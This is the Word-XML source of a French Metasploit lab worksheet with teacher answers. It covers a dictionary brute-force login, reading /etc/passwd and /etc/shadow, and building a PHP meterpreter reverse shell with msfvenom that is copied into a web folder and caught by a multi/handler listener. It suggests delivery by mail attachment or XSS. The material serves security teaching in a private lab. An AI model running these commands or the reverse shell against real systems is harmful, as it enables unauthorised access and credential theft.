          <w:color w:val="C9211E"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> /usr/share/wordlists/password.lst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spacing w:lineRule="auto" w:line="336"/>
        <w:ind w:left="846" w:right="784" w:hanging="454"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Exécutez le payload et attendez un peu (pas trop)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5" w:leader="none"/>
          <w:tab w:val="left" w:pos="846" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="336"/>
        <w:ind w:left="846" w:right="784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run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spacing w:lineRule="auto" w:line="336"/>
        <w:ind w:left="846" w:right="784" w:hanging="454"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Arrêtez le payload, mettez les options </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="81D41A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>STOP_ON_SUCCESS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="81D41A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>VERBOSE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">à </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="81D41A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>yes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>et ré-exécutez le</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-32"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>payload. Qu’en pensez-vous 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5" w:leader="none"/>
          <w:tab w:val="left" w:pos="846" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="336"/>
        <w:ind w:left="846" w:right="784" w:hanging="0"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C9211E"/>
        </w:rPr>
        <w:t>set STOP_ON_SUCCESS yes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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set VERBOSE yes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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run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spacing w:lineRule="auto" w:line="336"/>
        <w:ind w:left="846" w:right="784" w:hanging="454"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>On va tricher un peu, on va réduire la taille du dictionnaire. Tapez la commande suivante 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spacing w:lineRule="auto" w:line="336"/>
        <w:ind w:left="846" w:right="784" w:hanging="0"/>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="81D41A"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="81D41A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>cat password.lst | grep onz &gt; /usr/share/wordlists/reduit.lst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spacing w:lineRule="auto" w:line="336"/>
        <w:ind w:left="846" w:right="784" w:hanging="0"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Reconfigurez le payload, relancez-le et cette fois attendez …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spacing w:lineRule="auto" w:line="336"/>
        <w:ind w:left="846" w:right="784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du coup ça va être bonzo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spacing w:before="2" w:after="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Listez les sessions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1967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</w:rPr>
        <w:t>sessions -l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spacing w:before="86" w:after="0"/>
        <w:ind w:left="846" w:hanging="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Que remarquez-vous</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>?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spacing w:before="86" w:after="0"/>
        <w:ind w:left="846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quelqu'un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rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Ouvrez la session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1967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</w:rPr>
        <w:t>sessions &lt;#ID de session&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:before="86" w:after="0"/>
        <w:ind w:left="830" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Testez quelques commandes GNU/Linux usuelles…</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:before="86" w:after="0"/>
        <w:ind w:left="830" w:hanging="0"/>
        <w:rPr>
          <w:b/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Pouvez-vous afficher le contenu de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> ? De </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/etc/shadow</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t> ?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b/>
          <w:bCs/>
          <w:color w:val="81D41A"/>
        </w:rPr>
        <w:t>cat /etc/passwd &amp;&amp; cat /etc/</w:t>
      </w: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shadow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root:x:0:0:root:/root:/bin/bash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daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin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bin:x:2:2:bin:/bin:/usr/sbin/nologin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sys:x:3:3:sys:/dev:/usr/sbin/nologin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sync:x:4:65534:sync:/bin:/bin/sync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games:x:5:60:games:/usr/games:/usr/sbin/nologin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man:x:6:12:man:/var/cache/man:/usr/sbin/nologin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lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin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mail:x:8:8:mail:/var/mail:/usr/sbin/nologin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news:x:9:9:news:/var/spool/news:/usr/sbin/nologin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uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin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proxy:x:13:13:proxy:/bin:/usr/sbin/nologin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www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin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backup:x:34:34:backup:/var/backups:/usr/sbin/nologin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list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin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irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin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gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin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nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin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_apt:x:100:65534::/nonexistent:/usr/sbin/nologin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systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin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systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin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messagebus:x:103:109::/nonexistent:/usr/sbin/nologin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systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin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toto:x:1000:1000:toto,,,:/home/toto:/bin/bash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systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin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sshd:x:105:65534::/run/sshd:/usr/sbin/nologin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vboxadd:x:998:1::/var/run/vboxadd:/bin/false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ossec:x:106:112::/var/ossec/:/sbin/nologin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tftp:x:107:114:tftp daemon,,,:/srv/tftp:/usr/sbin/nologin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bind:x:108:115::/var/cache/bind:/usr/sbin/nologin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Debian-snmp:x:109:116::/var/lib/snmp:/bin/false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george:x:1001:1001:george,,,:/home/george:/bin/bash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bad:x:1002:1002::/home/bad:/bin/sh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/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george@debian:~$ cat /etc/shadow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:before="86" w:after="0"/>
        <w:ind w:hanging="0"/>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="81D41A"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="81D41A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR" w:eastAsia="fr-FR" w:bidi="fr-FR"/>
        </w:rPr>
        <w:t>cat: /etc/shadow: Permission non accordée</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:before="114" w:after="0"/>
        <w:ind w:left="830" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Quels sont les fichiers présents dans le répertoire de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">george </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:before="114" w:after="0"/>
        <w:ind w:hanging="0"/>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="81D41A"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="81D41A"/>
        </w:rPr>
        <w:t>public_html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="845" w:leader="none"/>
          <w:tab w:val="left" w:pos="846" w:leader="none"/>
        </w:tabs>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="845" w:leader="none"/>
          <w:tab w:val="left" w:pos="846" w:leader="none"/>
        </w:tabs>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Très clairement, ce payload exécuté dans ces conditions n’est pas le meilleur pour faire de la force brute sur un dictionnaire comme « rockyou » … à moins d’avoir des années devant soi. Cela dit, il recèle beaucoup d’autres fonctionnalités qui peuvent être intéressantes dans d’autres contextes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="845" w:leader="none"/>
          <w:tab w:val="left" w:pos="846" w:leader="none"/>
        </w:tabs>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24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8" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="155" w:after="0"/>
        <w:ind w:left="468" w:hanging="358"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="E)_Reverse_shell_php"/>
      <w:bookmarkStart w:id="7" w:name="_bookmark4"/>
      <w:bookmarkEnd w:id="6"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r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page">
                  <wp:posOffset>360680</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>377190</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6840855" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom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4pt,29.7pt" to="566.95pt,29.7pt" ID="Image3" stroked="t" style="position:absolute;flip:x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Reverse shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:before="141" w:after="0"/>
        <w:ind w:left="392" w:right="132" w:hanging="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Dans le cadre de la phase d’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>armement</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> (weaponization) ou d’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>installation</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, de la Cyber Kill Chain Metasploit permet de forger des fichiers adaptés à la cible. Voici une arme qui permet d’installer une porte dérobée sur la machine cible, sous la forme d’un shell inverse.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:before="114" w:after="0"/>
        <w:ind w:left="392" w:right="120" w:hanging="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>C’est très utile dans le cas où la machine cible se trouve derrière un pare-feu et ne dispose que d’une adresse privée (à l’exception d’un éventuel NAT statique si elle offre un service public)  C’est la machine cible qui va se connecter alors à votre Metasploit (ce n’est pas très discret puisque ça révèle votre IP publique... à vous de prendre vos dispositions !).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:before="114" w:after="0"/>
        <w:ind w:left="392" w:hanging="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Parmi les divers langages shell proposés, nous utiliserons PHP.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6" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="336"/>
        <w:ind w:left="830" w:right="2055" w:hanging="438"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Dans le navigateur accédez au fichier </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">phpinfo.php </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>de la machine attaquée.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> Quel URL avez-vous tapée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6" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="336"/>
        <w:ind w:left="846" w:right="2055" w:hanging="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C9211E"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C9211E"/>
        </w:rPr>
        <w:t>http://192.168.2.23/~george/phpinfo.php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:before="1" w:after="0"/>
        <w:ind w:left="830" w:hanging="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Quelle est la version de PHP ?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:before="1" w:after="0"/>
        <w:ind w:hanging="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C9211E"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C9211E"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>7.4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6" w:leader="none"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Créez un reverse shell PHP avec la</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>commande</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="846" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="1276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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msfvenom -p php/meterpreter_reverse_tcp lhost= … lport=9999 -f raw &gt; shell.php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:before="84" w:after="0"/>
        <w:ind w:left="830" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Mettez l’adresse IP de votre Metasploit comme paramètre </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">lhost </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:before="84" w:after="0"/>
        <w:ind w:hanging="0"/>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C9211E"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C9211E"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom -p php/meterpreter_reverse_tcp lhost=192.168.2.4 lport=9999 -f raw &gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C9211E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="fr-FR" w:bidi="fr-FR"/>
        </w:rPr>
        <w:t>ad</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C9211E"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.php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846" w:right="492" w:hanging="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Avez-vous compris à quoi servent ces deux paramètres </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>lhost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>lport</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t> ?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right="49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on va accèder à notre shell sur lhost &amp; port lport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846" w:right="492" w:hanging="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Dans un contexte réel, il faudrait placer ce programme dans le dossier /home/george/public_html ou autre dossier susceptible de contenir des programmes php exécutables à travers le serveur web.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846" w:right="492" w:hanging="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Cela peut être fait par exemple par une arme envoyée en pièce jointe d’un mail ou par une exploitation de vulnérabité XSS.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846" w:right="492" w:hanging="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Dans le cadre de ce TP, nous ferons simplement la copie en supposant que l’arme a été déclenchée et la copie réalisée …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ind w:left="846" w:right="492" w:hanging="454"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Copiez le fichier shell.php sur la machine cible</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:before="82" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Où et comment allez-vous copier le fichier ?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:before="82" w:after="0"/>
        <w:ind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scp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C9211E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR" w:eastAsia="fr-FR" w:bidi="fr-FR"/>
        </w:rPr>
        <w:t>ad</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C9211E"/>
        </w:rPr>
        <w:t>.php george@192.168.2.23:/home/george/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C9211E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR" w:eastAsia="fr-FR" w:bidi="fr-FR"/>
        </w:rPr>
        <w:t>public_html/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C9211E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rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Sur Metasploit, lancez un serveur pour recevoir la connexion entrante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ind w:left="1967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</w:rPr>
        <w:t>use exploit/multi/handler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spacing w:before="0" w:after="0"/>
        <w:ind w:left="1967" w:hanging="0"/>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="81D41A"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="81D41A"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>set payload php/meterpreter_reverse_php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:before="84" w:after="0"/>
        <w:ind w:left="830" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Quelles options faut-il définir ?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:before="84" w:after="0"/>
        <w:ind w:hanging="0"/>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="C9211E"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="C9211E"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:before="84" w:after="0"/>
        <w:ind w:hanging="0"/>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="C9211E"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="C9211E"/>
        </w:rPr>
        <w:t>sudo msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:before="84" w:after="0"/>
        <w:ind w:hanging="0"/>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="C9211E"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="C9211E"/>
        </w:rPr>
        <w:t>use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="845" w:leader="none"/>
          <w:tab w:val="left" w:pos="846" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="C9211E"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>set payload php/meterpreter_reverse_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="C9211E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="fr-FR" w:bidi="fr-FR"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:before="84" w:after="0"/>
        <w:ind w:hanging="0"/>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="C9211E"/>
        </w:rPr>
